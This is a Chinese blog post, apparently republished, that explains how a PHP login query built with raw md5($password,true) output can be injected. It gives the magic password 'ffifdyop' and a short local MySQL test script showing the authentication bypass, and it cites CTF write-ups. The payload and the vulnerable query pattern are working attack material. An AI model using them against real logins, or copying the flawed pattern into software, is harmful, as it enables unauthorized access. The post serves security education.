码迷,mamicode.com
首页 > 数据库 > 详细

1022.MD5加密后的SQL 注入

时间:2019-02-18 01:10:33      阅读:220      评论:0      收藏:0      [点我收藏+]

标签:res   die   keyword   etc   string   could not   exit   query   ras   

今天看到$sql = "SELECT * FROM admin WHERE pass = ‘".md5($password,true)."‘";这样一个sql,其实可以注入。

思路比较明确,当md5后的hex转换成字符串后,如果包含‘or‘<trash>这样的字符串,那整个sql变成

SELECT * FROM admin WHERE pass = ‘‘or‘6<trash>‘

很明显可以注入了。

难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。
提供一个字符串:ffifdyop 
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串:‘or‘6<trash>

测试代码:

<?php 
    
error_reporting(0);

$link = mysql_connect(‘localhost‘, ‘root‘, ‘‘);
if (!$link) { 
    die(‘Could not connect to MySQL: ‘ . mysql_error()); 
} 

// 选择数据库
$db = mysql_select_db("test", $link);
if(!$db)
{
    echo ‘select db error‘;
    exit();
}

// 执行sql
$password = "ffifdyop";
$sql = "SELECT * FROM admin WHERE pass = ‘".md5($password,true)."‘";
var_dump($sql);
$result=mysql_query($sql) or die(‘<pre>‘ . mysql_error() . ‘</pre>‘ );

$row1 = mysql_fetch_row($result);
var_dump($row1);

mysql_close($link);

?>

效果:
技术图片

参考:
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/
http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes

1022.MD5加密后的SQL 注入

标签:res   die   keyword   etc   string   could not   exit   query   ras   

原文地址:https://www.cnblogs.com/beijibing/p/10393526.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!